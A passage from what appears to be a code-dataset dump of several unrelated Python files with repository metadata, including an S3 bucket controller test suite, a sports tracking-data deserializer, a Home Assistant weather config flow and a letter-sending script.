resource_data = load_s3_resource(
resource_file_name,
additional_replacements=replacements,
)
logging.debug(resource_data)
return resource_data
def create_bucket(resource_file_name: str) -> Bucket:
resource_name = random_suffix_name("s3-bucket", 24)
resource_data = load_bucket_resource(resource_file_name, resource_name)
logging.info(f"Creating bucket {resource_name}")
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
resource_data = k8s.create_custom_resource(ref, resource_data)
k8s.wait_resource_consumed_by_controller(ref)
time.sleep(CREATE_WAIT_AFTER_SECONDS)
return Bucket(ref, resource_name, resource_data)
def replace_bucket_spec(bucket: Bucket, resource_file_name: str):
resource_data = load_bucket_resource(resource_file_name, bucket.resource_name)
# Fetch latest version before patching
bucket.resource_data = k8s.get_resource(bucket.ref)
bucket.resource_data["spec"] = resource_data["spec"]
bucket.resource_data = k8s.replace_custom_resource(bucket.ref, bucket.resource_data)
time.sleep(MODIFY_WAIT_AFTER_SECONDS)
def delete_bucket(bucket: Bucket):
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(bucket.ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
@pytest.fixture(scope="function")
def basic_bucket(s3_client) -> Generator[Bucket, None, None]:
bucket = None
try:
bucket = create_bucket("bucket")
assert k8s.get_resource_exists(bucket.ref)
exists = bucket_exists(s3_client, bucket)
assert exists
except:
if bucket is not None:
delete_bucket(bucket)
return pytest.fail("Bucket failed to create")
yield bucket
delete_bucket(bucket)
exists = bucket_exists(s3_client, bucket)
assert not exists
@service_marker
class TestBucket:
def test_basic(self, basic_bucket):
# Existence assertions are handled by the fixture
assert basic_bucket
def test_put_fields(self, s3_client, s3_resource, basic_bucket):
self._update_assert_accelerate(basic_bucket, s3_client)
self._update_assert_cors(basic_bucket, s3_resource)
self._update_assert_encryption(basic_bucket, s3_client)
self._update_assert_lifecycle(basic_bucket, s3_resource)
self._update_assert_logging(basic_bucket, s3_resource)
self._update_assert_notification(basic_bucket, s3_resource)
self._update_assert_ownership_controls(basic_bucket, s3_client)
self._update_assert_policy(basic_bucket, s3_resource)
self._update_assert_replication(basic_bucket, s3_client)
self._update_assert_request_payment(basic_bucket, s3_resource)
self._update_assert_tagging(basic_bucket, s3_resource)
self._update_assert_versioning(basic_bucket, s3_resource)
self._update_assert_website(basic_bucket, s3_resource)
def _update_assert_accelerate(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_accelerate")
accelerate_configuration = s3_client.get_bucket_accelerate_configuration(Bucket=bucket.resource_name)
desired = bucket.resource_data["spec"]["accelerate"]
latest = accelerate_configuration
assert desired["status"] == latest["Status"]
def _update_assert_cors(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_cors")
latest = get_bucket(s3_resource, bucket.resource_name)
cors = latest.Cors()
desired_rule = bucket.resource_data["spec"]["cors"]["corsRules"][0]
latest_rule = cors.cors_rules[0]
assert desired_rule.get("allowedMethods", []) == latest_rule.get("AllowedMethods", [])
assert desired_rule.get("allowedOrigins", []) == latest_rule.get("AllowedOrigins", [])
assert desired_rule.get("allowedHeaders", []) == latest_rule.get("AllowedHeaders", [])
assert desired_rule.get("exposeHeaders", []) == latest_rule.get("ExposeHeaders", [])
def _update_assert_encryption(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_encryption")
encryption = s3_client.get_bucket_encryption(Bucket=bucket.resource_name)
desired_rule = bucket.resource_data["spec"]["encryption"]["rules"][0]
latest_rule = encryption["ServerSideEncryptionConfiguration"]["Rules"][0]
assert desired_rule["applyServerSideEncryptionByDefault"]["sseAlgorithm"] == \
latest_rule["ApplyServerSideEncryptionByDefault"]["SSEAlgorithm"]
def _update_assert_lifecycle(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_lifecycle")
latest = get_bucket(s3_resource, bucket.resource_name)
request_payment = latest.LifecycleConfiguration()
desired_rule = bucket.resource_data["spec"]["lifecycle"]["rules"][0]
latest_rule = request_payment.rules[0]
assert desired_rule["id"] == latest_rule["ID"]
assert desired_rule["status"] == latest_rule["Status"]
def _update_assert_logging(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_logging")
latest = get_bucket(s3_resource, bucket.resource_name)
logging = latest.Logging()
desired = bucket.resource_data["spec"]["logging"]["loggingEnabled"]
latest = logging.logging_enabled
assert desired["targetBucket"] == latest["TargetBucket"]
assert desired["targetPrefix"] == latest["TargetPrefix"]
def _update_assert_notification(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_notification")
latest = get_bucket(s3_resource, bucket.resource_name)
notification = latest.Notification()
desired_config = bucket.resource_data["spec"]["notification"]["topicConfigurations"][0]
latest_config = notification.topic_configurations[0]
assert desired_config["id"] == latest_config["Id"]
assert desired_config["topicARN"] == latest_config["TopicArn"]
def _update_assert_ownership_controls(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_ownership_controls")
ownership_controls = s3_client.get_bucket_ownership_controls(Bucket=bucket.resource_name)
desired_rule = bucket.resource_data["spec"]["ownershipControls"]["rules"][0]
latest_rule = ownership_controls["OwnershipControls"]["Rules"][0]
assert desired_rule["objectOwnership"] == latest_rule["ObjectOwnership"]
def _update_assert_policy(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_policy")
latest = get_bucket(s3_resource, bucket.resource_name)
policy = latest.Policy()
        # Strip all whitespace from both policies before comparing
desired = re.sub(r"\s+", "", bucket.resource_data["spec"]["policy"], flags=re.UNICODE)
latest = re.sub(r"\s+", "", policy.policy, flags=re.UNICODE)
assert desired == latest
def _update_assert_replication(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_replication")
replication = s3_client.get_bucket_replication(Bucket=bucket.resource_name)
desired = bucket.resource_data["spec"]["replication"]
latest = replication["ReplicationConfiguration"]
desired_rule = desired["rules"][0]
latest_rule = latest["Rules"][0]
assert desired["role"] == latest["Role"]
assert desired_rule["id"] == latest_rule["ID"]
assert desired_rule["destination"]["bucket"] == latest_rule["Destination"]["Bucket"]
def _update_assert_request_payment(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_request_payment")
latest = get_bucket(s3_resource, bucket.resource_name)
request_payment = latest.RequestPayment()
desired = bucket.resource_data["spec"]["requestPayment"]["payer"]
latest = request_payment.payer
assert desired == latest
def _update_assert_tagging(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_tagging")
latest = get_bucket(s3_resource, bucket.resource_name)
tagging = latest.Tagging()
desired = bucket.resource_data["spec"]["tagging"]["tagSet"]
latest = tagging.tag_set
for i in range(2):
assert desired[i]["key"] == latest[i]["Key"]
assert desired[i]["value"] == latest[i]["Value"]
def _update_assert_versioning(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_versioning")
latest = get_bucket(s3_resource, bucket.resource_name)
versioning = latest.Versioning()
desired = bucket.resource_data["spec"]["versioning"]["status"]
latest = versioning.status
assert desired == latest
def _update_assert_website(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_website")
latest = get_bucket(s3_resource, bucket.resource_name)
website = latest.Website()
desired = bucket.resource_data["spec"]["website"]
latest = website
assert desired["errorDocument"]["key"] == latest.error_document["Key"]
assert desired["indexDocument"]["suffix"] == latest.index_document["Suffix"] | 9,446 | 71 | 608 |
4653c46601b0d10d1b8237b0bec1d4bfbfd387d8 | 987 | py | Python | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | 5 | 2021-04-17T15:26:29.000Z | 2021-10-11T13:17:56.000Z | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | null | null | null | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | 2 | 2021-11-28T06:40:23.000Z | 2022-01-17T12:20:21.000Z | import glob
import cv2
import regex as re
from .deep_optical_flow import deep_optical_flow
from .interpolations import warp_flow
from .parameters import *
def sphere_interpolation(model_path="./flownet2/pretrained_models/FlowNet2_checkpoint.pth.tar"):
"""
Sphere dataset interpolation of Frame N+1 from Frame N and Frame N+2
:param model_path: Path to pretrained optical flow model
:return: None
"""
images = glob.glob("./input/sphere/*.ppm")
    images.sort(key=lambda f: int(re.sub(r"\D", "", f)))
for ind in range(0, len(images) - 2, 2):
firstImage = cv2.imread(images[ind])
secondImage = cv2.imread(images[ind + 2])
forward_flow, If = deep_optical_flow(model_path, firstImage, secondImage, LR, NUM_ITER, ind, "sphere")
backward_flow, Ib = deep_optical_flow(model_path, secondImage, firstImage, LR, NUM_ITER, ind, "sphere")
warp_flow(firstImage, secondImage, forward_flow, If, backward_flow, Ib, ind, "sphere")
| 36.555556 | 111 | 0.707194 | import glob
import cv2
import regex as re
from .deep_optical_flow import deep_optical_flow
from .interpolations import warp_flow
from .parameters import *
def sphere_interpolation(model_path="./flownet2/pretrained_models/FlowNet2_checkpoint.pth.tar"):
"""
Sphere dataset interpolation of Frame N+1 from Frame N and Frame N+2
:param model_path: Path to pretrained optical flow model
:return: None
"""
images = glob.glob("./input/sphere/*.ppm")
    images.sort(key=lambda f: int(re.sub(r"\D", "", f)))
for ind in range(0, len(images) - 2, 2):
firstImage = cv2.imread(images[ind])
secondImage = cv2.imread(images[ind + 2])
forward_flow, If = deep_optical_flow(model_path, firstImage, secondImage, LR, NUM_ITER, ind, "sphere")
backward_flow, Ib = deep_optical_flow(model_path, secondImage, firstImage, LR, NUM_ITER, ind, "sphere")
warp_flow(firstImage, secondImage, forward_flow, If, backward_flow, Ib, ind, "sphere")
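# Illustrative usage sketch (added for clarity; not part of the original module):
# with no argument the default FlowNet2 checkpoint path from the signature above is
# used, and frames are read from ./input/sphere/; warp_flow writes the interpolated
# frames as a side effect.
if __name__ == "__main__":
    sphere_interpolation()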
| 0 | 0 | 0 |
875c50a031df3d5ca588d2664761bc39b8ece01c | 9,363 | py | Python | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | import json
import logging
from typing import Tuple, Dict, Optional, Union, NamedTuple, IO
from lxml import objectify
from kloppy.domain import (
TrackingDataset,
DatasetFlag,
AttackingDirection,
Frame,
Point,
Point3D,
Team,
BallState,
Period,
Provider,
Orientation,
attacking_direction_from_frame,
Metadata,
Ground,
Player,
build_coordinate_system,
Provider,
Transformer,
PlayerData,
)
from kloppy.utils import Readable, performance_logging
from .deserializer import TrackingDataDeserializer
logger = logging.getLogger(__name__)
| 35.736641 | 109 | 0.522162 | import json
import logging
from typing import Tuple, Dict, Optional, Union, NamedTuple, IO
from lxml import objectify
from kloppy.domain import (
TrackingDataset,
DatasetFlag,
AttackingDirection,
Frame,
Point,
Point3D,
Team,
BallState,
Period,
Provider,
Orientation,
attacking_direction_from_frame,
Metadata,
Ground,
Player,
build_coordinate_system,
Provider,
Transformer,
PlayerData,
)
from kloppy.utils import Readable, performance_logging
from .deserializer import TrackingDataDeserializer
logger = logging.getLogger(__name__)
class SecondSpectrumInputs(NamedTuple):
meta_data: IO[bytes]
raw_data: IO[bytes]
additional_meta_data: Optional[IO[bytes]] = None
class SecondSpectrumDeserializer(
TrackingDataDeserializer[SecondSpectrumInputs]
):
def __init__(
self,
limit: Optional[int] = None,
sample_rate: Optional[float] = None,
coordinate_system: Optional[Union[str, Provider]] = None,
only_alive: Optional[bool] = True,
):
super().__init__(limit, sample_rate, coordinate_system)
self.only_alive = only_alive
@property
def provider(self) -> Provider:
return Provider.SECONDSPECTRUM
@classmethod
def _frame_from_framedata(cls, teams, period, frame_data):
frame_id = frame_data["frameIdx"]
frame_timestamp = frame_data["gameClock"]
ball_x, ball_y, ball_z = frame_data["ball"]["xyz"]
ball_state = BallState.ALIVE if frame_data["live"] else BallState.DEAD
ball_owning_team = (
teams[0] if frame_data["lastTouch"] == "home" else teams[1]
)
players_data = {}
for team, team_str in zip(teams, ["homePlayers", "awayPlayers"]):
for player_data in frame_data[team_str]:
jersey_no = player_data["number"]
x, y, _ = player_data["xyz"]
player = team.get_player_by_jersey_number(jersey_no)
if not player:
player = Player(
player_id=player_data["playerId"],
team=team,
jersey_no=int(jersey_no),
)
team.players.append(player)
players_data[player] = PlayerData(
coordinates=Point(float(x), float(y))
)
return Frame(
frame_id=frame_id,
timestamp=frame_timestamp,
ball_coordinates=Point3D(
float(ball_x), float(ball_y), float(ball_z)
),
ball_state=ball_state,
ball_owning_team=ball_owning_team,
players_data=players_data,
period=period,
other_data={},
)
@staticmethod
def __validate_inputs(inputs: Dict[str, Readable]):
if "xml_metadata" not in inputs:
raise ValueError("Please specify a value for 'xml_metadata'")
if "raw_data" not in inputs:
raise ValueError("Please specify a value for 'raw_data'")
def deserialize(self, inputs: SecondSpectrumInputs) -> TrackingDataset:
# Handles the XML metadata that contains the pitch dimensions and frame info
with performance_logging("Loading XML metadata", logger=logger):
match = objectify.fromstring(inputs.meta_data.read()).match
frame_rate = int(match.attrib["iFrameRateFps"])
pitch_size_height = float(match.attrib["fPitchYSizeMeters"])
pitch_size_width = float(match.attrib["fPitchXSizeMeters"])
periods = []
for period in match.iterchildren(tag="period"):
start_frame_id = int(period.attrib["iStartFrame"])
end_frame_id = int(period.attrib["iEndFrame"])
if start_frame_id != 0 or end_frame_id != 0:
# Frame IDs are unix timestamps (in milliseconds)
periods.append(
Period(
id=int(period.attrib["iId"]),
start_timestamp=start_frame_id,
end_timestamp=end_frame_id,
)
)
# Default team initialisation
home_team = Team(team_id="home", name="home", ground=Ground.HOME)
away_team = Team(team_id="away", name="away", ground=Ground.AWAY)
teams = [home_team, away_team]
if inputs.additional_meta_data:
with performance_logging("Loading JSON metadata", logger=logger):
try:
metadata = json.loads(inputs.additional_meta_data.read())
home_team_id = metadata["homeOptaId"]
away_team_id = metadata["awayOptaId"]
# Tries to parse (short) team names from the description string
try:
home_name = (
metadata["description"].split("-")[0].strip()
)
away_name = (
metadata["description"]
.split("-")[1]
.split(":")[0]
.strip()
)
except:
home_name, away_name = "home", "away"
teams[0].team_id = home_team_id
teams[0].name = home_name
teams[1].team_id = away_team_id
teams[1].name = away_name
for team, team_str in zip(
teams, ["homePlayers", "awayPlayers"]
):
for player_data in metadata[team_str]:
# We use the attributes field of Player to store the extra IDs provided by the
# metadata. We designate the player_id to be the 'optaId' field as this is what's
# used as 'player_id' in the raw frame data file
player_attributes = {
k: v
for k, v in player_data.items()
if k in ["ssiId", "optaUuid"]
}
player = Player(
player_id=player_data["optaId"],
name=player_data["name"],
starting=player_data["position"] != "SUB",
position=player_data["position"],
team=team,
jersey_no=int(player_data["number"]),
attributes=player_attributes,
)
team.players.append(player)
except: # TODO: More specific exception
logging.warning(
"Optional JSON Metadata is malformed. Continuing without"
)
# Handles the tracking frame data
with performance_logging("Loading data", logger=logger):
transformer = self.get_transformer(
length=pitch_size_width, width=pitch_size_height
)
def _iter():
n = 0
sample = 1 / self.sample_rate
for line_ in inputs.raw_data.readlines():
line_ = line_.strip().decode("ascii")
if not line_:
continue
# Each line is just json so we just parse it
frame_data = json.loads(line_)
if self.only_alive and not frame_data["live"]:
continue
if n % sample == 0:
yield frame_data
n += 1
frames = []
for n, frame_data in enumerate(_iter()):
period = periods[frame_data["period"] - 1]
frame = self._frame_from_framedata(teams, period, frame_data)
frame = transformer.transform_frame(frame)
frames.append(frame)
if not period.attacking_direction_set:
period.set_attacking_direction(
attacking_direction=attacking_direction_from_frame(
frame
)
)
if self.limit and n + 1 >= self.limit:
break
orientation = (
Orientation.FIXED_HOME_AWAY
if periods[0].attacking_direction == AttackingDirection.HOME_AWAY
else Orientation.FIXED_AWAY_HOME
)
metadata = Metadata(
teams=teams,
periods=periods,
pitch_dimensions=transformer.get_to_coordinate_system().pitch_dimensions,
score=None,
frame_rate=frame_rate,
orientation=orientation,
provider=Provider.SECONDSPECTRUM,
flags=DatasetFlag.BALL_OWNING_TEAM | DatasetFlag.BALL_STATE,
coordinate_system=transformer.get_to_coordinate_system(),
)
return TrackingDataset(
records=frames,
metadata=metadata,
)
| 8,335 | 369 | 46 |
124e4f0bae283d78713ff0d955d4def0bcc6fe58 | 4,091 | py | Python | home-assistant/custom_components/meteo-swiss/config_flow.py | twhite96/smart-home-setup | 25222e26b770275b43f227b45cf7e0f8ba749595 | [
"MIT"
] | 190 | 2020-05-03T21:13:00.000Z | 2022-03-31T23:16:30.000Z | home-assistant/custom_components/meteo-swiss/config_flow.py | heinoskov/smart-home-setup | 896d1f09bfd7059681f7b0b0f1935159dd12b512 | [
"MIT"
] | 11 | 2020-11-20T10:57:00.000Z | 2022-03-18T07:42:43.000Z | home-assistant/custom_components/meteo-swiss/config_flow.py | heinoskov/smart-home-setup | 896d1f09bfd7059681f7b0b0f1935159dd12b512 | [
"MIT"
] | 21 | 2020-10-02T14:44:06.000Z | 2022-02-27T10:50:08.000Z | """Config flow to configure the Meteo-Swiss integration."""
import logging
import re
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant import config_entries
from homeassistant.core import callback
from .const import DOMAIN,CONF_POSTCODE,CONF_STATION,CONF_ENABLESENSORS
from hamsclient import meteoSwissClient
_LOGGER = logging.getLogger(__name__)
| 37.87963 | 135 | 0.644341 | """Config flow to configure the Meteo-Swiss integration."""
import logging
import re
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant import config_entries
from homeassistant.core import callback
from .const import DOMAIN,CONF_POSTCODE,CONF_STATION,CONF_ENABLESENSORS
from hamsclient import meteoSwissClient
_LOGGER = logging.getLogger(__name__)
class MeteoSwissFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_POLL
def __init__(self):
"""Init FlowHandler."""
self._errors = {}
async def validate_config(self,config):
#check if the station id is found in stastion list
stationNameChk = await self.hass.async_add_executor_job(self._client.get_station_name,config[CONF_STATION])
if(stationNameChk is None):
self._errors[CONF_STATION] = "invalid_station_id"
_LOGGER.warning("%s not found in meteo swiss station list"%(config[CONF_STATION]))
#check if the station name is 3 character
if(not re.match(r"^\w{3}$",config[CONF_STATION])):
self._errors[CONF_STATION] = "invalid_station_name"
_LOGGER.warning("%s is not a valid station ID"%config[CONF_STATION])
if(not re.match(r"^\d{4}$",str(config[CONF_POSTCODE]))):
self._errors[CONF_POSTCODE] = "invalid_postcode"
_LOGGER.warning("%s is not a valid post code"%config[CONF_POSTCODE])
if(len(self._errors) == 0):
_LOGGER.info("Configuration for meteo swiss intergration validated")
return True
else:
_LOGGER.error("Configuration error for meteo suisse integration")
return False
async def async_step_user(self, user_input=None):
"""Handle a flow initiated by the user."""
self._errors = {}
lat = self.hass.config.latitude
lon = self.hass.config.longitude
self._client = await self.hass.async_add_executor_job(meteoSwissClient)
self._postCode = await self.hass.async_add_executor_job(self._client.getPostCode,lat,lon)
_LOGGER.debug("Get closest station for Lon : %s - Lat : %s",lon,lat)
self._station =await self.hass.async_add_executor_job(self._client.get_closest_station,lat,lon)
if(self._station is not None):
self._stationName = await self.hass.async_add_executor_job(self._client.get_station_name,self._station)
else:
self._stationName = None
_LOGGER.debug("Lon : %s - Lat : %s - PostCode %s Station %s Name: %s"%(lon,lat,self._postCode,self._station,self._stationName))
if user_input is not None:
_LOGGER.debug("User input is set")
if(await self.validate_config(user_input)):
return self.async_create_entry(title=user_input[CONF_NAME],data=user_input)
else:
return self._show_config_form(user_input)
else:
_LOGGER.debug("User input is set value is not set: ")
return self._show_config_form(user_input)
@callback
def _show_config_form(self,user_input):
"""Show the setup form to the user."""
if user_input is None:
user_input = {}
data_schema = {
vol.Required(CONF_NAME,default=self._stationName): str,
vol.Required(CONF_POSTCODE,default=self._postCode): int,
vol.Required(CONF_STATION,default=self._station): str,
vol.Required(CONF_ENABLESENSORS,default=True):bool
}
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(data_schema),
errors=self._errors
)
async def async_step_import(self, user_input):
"""Import a config entry."""
print(user_input)
return await self.async_step_user(user_input) | 1,149 | 2,492 | 31 |
a04c3f1060786937b154ac2f4bf2b64f1b4b9af4 | 1,969 | py | Python | chips/utils/block_diagram.py | dillonhuff/Chips-2.0 | c78df1597b5f6b024723c4804c6797e4b00387ca | [
"MIT"
] | 221 | 2015-02-23T20:03:29.000Z | 2021-12-23T13:08:24.000Z | chips/utils/block_diagram.py | dillonhuff/Chips-2.0 | c78df1597b5f6b024723c4804c6797e4b00387ca | [
"MIT"
] | 10 | 2015-10-08T14:30:31.000Z | 2019-04-28T04:42:44.000Z | chips/utils/block_diagram.py | dawsonjon/Chips-2.0 | 57a986b8df36248bb4736bd84e3e68046b8665af | [
"MIT"
] | 31 | 2015-10-31T00:51:03.000Z | 2021-09-06T15:40:58.000Z | from graphviz import Digraph
if __name__ == "__main__":
from chips.api.api import *
from chips.components.components import *
c = Chip("my_chip")
a = Input(c, "a")
b = Input(c, "b")
d = Input(c, "d")
e = Input(c, "e")
x, y = tee(c, add(c, add(c, a, b), add(c, d, e)))
discard(c, x)
discard(c, y)
b = BlockDiagram(c)
b.view()
| 29.38806 | 72 | 0.504317 | from graphviz import Digraph
class BlockDiagram():
def __init__(self, chip):
self.chip = chip
g = Digraph(self.chip.name, graph_attr={"rankdir": "LR"})
sources = {}
sinks = {}
for instance in self.chip.instances:
for port, wire in instance.inputs.iteritems():
sinks[str(id(wire))] = str(id(instance)) + ":" + port
for port, wire in instance.outputs.iteritems():
sources[str(id(wire))] = str(id(instance)) + ":" + port
inputs = "|".join(["<%s> %s" % (i, i)
for i in instance.inputs.keys()])
outputs = "|".join(["<%s> %s" % (i, i)
for i in instance.outputs.keys()])
label = "{{%s}|%s|{%s}}" % (
inputs,
instance.component_name,
outputs
)
g.node(str(id(instance)), label=label, shape="record")
for input_ in self.chip.inputs.values():
sources[str(id(input_))] = str(id(input_))
g.node(str(id(input_)), label=input_.name, shape="record")
for output_ in self.chip.outputs.values():
sinks[str(id(output_))] = str(id(output_))
g.node(str(id(output_)), label=output_.name, shape="record")
for wire, source in sources.iteritems():
sink = sinks[wire]
g.edge(source, sink)
self.g = g
def render(self, *args, **vargs):
return self.g.render(*args, **vargs)
def view(self, *args, **vargs):
return self.g.view(*args, **vargs)
if __name__ == "__main__":
from chips.api.api import *
from chips.components.components import *
c = Chip("my_chip")
a = Input(c, "a")
b = Input(c, "b")
d = Input(c, "d")
e = Input(c, "e")
x, y = tee(c, add(c, add(c, a, b), add(c, d, e)))
discard(c, x)
discard(c, y)
b = BlockDiagram(c)
b.view()
| 1,489 | 0 | 104 |
60a49c861da6feae6b72110e74da55a2ab442def | 852 | py | Python | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 85 | 2017-11-21T12:22:02.000Z | 2022-03-27T23:07:17.000Z | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 545 | 2017-11-04T14:15:04.000Z | 2022-03-27T14:19:27.000Z | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 45 | 2017-11-11T12:36:30.000Z | 2022-02-25T06:10:44.000Z |
import smart_imports
smart_imports.all()
| 23.027027 | 63 | 0.656103 |
import smart_imports
smart_imports.all()
class Companion(meta_relations_objects.MetaType):
__slots__ = ('caption', )
TYPE = 6
TYPE_CAPTION = 'Спутник'
def __init__(self, caption, **kwargs):
super(Companion, self).__init__(**kwargs)
self.caption = caption
@property
def url(self):
return utils_urls.url('guide:companions:show', self.id)
@classmethod
def create_from_object(cls, companion):
return cls(id=companion.id, caption=companion.name)
@classmethod
def create_from_id(cls, id):
from . import storage
companion = storage.companions.get(id)
if companion is None:
return None
return cls.create_from_object(companion)
@classmethod
def create_from_ids(cls, ids):
return [cls.create_from_id(id) for id in ids]
| 485 | 307 | 23 |
a54fd76006cf7246fec8458be45888fd3ea922be | 920 | py | Python | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | 2 | 2020-06-07T21:28:54.000Z | 2020-09-02T16:11:59.000Z | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | null | null | null | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | null | null | null | import cuid, sys, os
from dotenv import load_dotenv
from notifications_python_client.notifications import NotificationsAPIClient
# Load .env
load_dotenv()
# Set up a new Notify client
notifications_client = NotificationsAPIClient(os.getenv("NOTIFY_KEY"))
# Generate a unique reference
id_gen = cuid.CuidGenerator()
id = id_gen.cuid()
# Get the file redirected to stdin (as a binary file)
input = sys.stdin.buffer.read()
with open(id, "wb") as output:
output.write(input)
# Convert from PostScript to PDF (has the effect of stripping out PCL which Notify doesn't like)
os.system("ps2pdf {} {}.pdf".format(id, id))
# Try to send a letter
with open("{}.pdf".format(id), "rb") as file_to_send:
notification = notifications_client.send_precompiled_letter_notification(
reference=id, pdf_file=file_to_send
)
print(notification)
# Delete local files
os.remove(id)
os.remove("{}.pdf".format(id)) | 28.75 | 96 | 0.745652 | import cuid, sys, os
from dotenv import load_dotenv
from notifications_python_client.notifications import NotificationsAPIClient
# Load .env
load_dotenv()
# Set up a new Notify client
notifications_client = NotificationsAPIClient(os.getenv("NOTIFY_KEY"))
# Generate a unique reference
id_gen = cuid.CuidGenerator()
id = id_gen.cuid()
# Get the file redirected to stdin (as a binary file)
input = sys.stdin.buffer.read()
with open(id, "wb") as output:
output.write(input)
# Convert from PostScript to PDF (has the effect of stripping out PCL which Notify doesn't like)
os.system("ps2pdf {} {}.pdf".format(id, id))
# Try to send a letter
with open("{}.pdf".format(id), "rb") as file_to_send:
notification = notifications_client.send_precompiled_letter_notification(
reference=id, pdf_file=file_to_send
)
print(notification)
# Delete local files
os.remove(id)
os.remove("{}.pdf".format(id)) | 0 | 0 | 0 |
17f2d50a4262facd9daff3b661d550302005ac42 | 460 | py | Python | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | null | null | null | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | 1 | 2022-02-06T08:21:56.000Z | 2022-02-06T15:48:26.000Z | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | null | null | null | '''
List module
'''
def split_list(elements: list, num_of_elements: int) -> list[list]:
'''
    Split a list into chunks
    Args:
        elements (list) : list of elements
        num_of_elements (int) : number of elements per chunk
    Returns:
        list[list]: list of resulting chunks
'''
items_list: list[list] = \
[elements[index : index + num_of_elements]
for index in range(0, len(elements), num_of_elements)]
return items_list
| 20 | 68 | 0.526087 | '''
List module
'''
def split_list(elements: list, num_of_elements: int) -> list[list]:
'''
    Split a list into chunks
    Args:
        elements (list) : list of elements
        num_of_elements (int) : number of elements per chunk
    Returns:
        list[list]: list of resulting chunks
'''
items_list: list[list] = \
[elements[index : index + num_of_elements]
for index in range(0, len(elements), num_of_elements)]
return items_list
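# Usage sketch (added for illustration; not part of the original module):
# a 5-element list split into chunks of 2 leaves a shorter final chunk.
if __name__ == '__main__':
    print(split_list([1, 2, 3, 4, 5], 2))  # [[1, 2], [3, 4], [5]]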
| 0 | 0 | 0 |
22c8b2bbccd08a3508fd4d200508de71b852595e | 230 | py | Python | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
def object_adder(a, b):
"""Adds two object together"""
if type(a) is not int or type(b) is not int:
raise TypeError("Object is not of type int")
return a + b
import sys
print(sys.argv)
| 20.909091 | 52 | 0.63913 | #!/usr/bin/env python3
def object_adder(a, b):
"""Adds two object together"""
if type(a) is not int or type(b) is not int:
raise TypeError("Object is not of type int")
return a + b
import sys
print(sys.argv)
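# Illustrative usage (added; not part of the original script): non-int arguments raise.
print(object_adder(2, 3))  # 5
try:
    object_adder(2, "3")
except TypeError as err:
    print(err)  # Object is not of type int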
| 0 | 0 | 0 |
a41459805297a3f06d4342530f581db1c689df22 | 6,044 | py | Python | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
